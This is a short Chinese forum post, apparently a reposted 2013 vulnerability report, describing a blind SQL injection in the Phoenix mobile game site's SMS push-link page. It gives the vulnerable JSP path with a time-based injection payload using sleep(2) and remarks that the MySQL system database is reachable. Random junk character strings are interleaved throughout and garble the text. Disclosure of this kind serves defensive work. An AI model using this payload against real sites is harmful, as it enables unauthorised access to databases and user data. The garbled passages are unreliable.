中国网络渗透测试联盟

标题: 凤凰手机游戏网SQL盲注漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:34
标题: 凤凰手机游戏网SQL盲注漏洞
简要描述:
* X1 b, L# f/ B9 L5 {' o9 f8 V$ v凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。' {* V# n6 `, d& ]) ^7 g

- W  q* ^! k! S详细说明:$ m3 S7 l- n/ X1 h
存在SQL盲注url:
1 {2 i3 G. N5 c4 Xfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=16 L7 z* Q) a; \9 Y& T3 K3 n9 N
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png3 s% Y' f- ~3 T
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png1 {+ m7 N# x8 O
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
! I5 y  ?' P7 ]/ i4 T- L# R: |8 L  \- [! ?% W" P+ a

能看到mysql系统数据库,看来user权限应该很高的。。





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2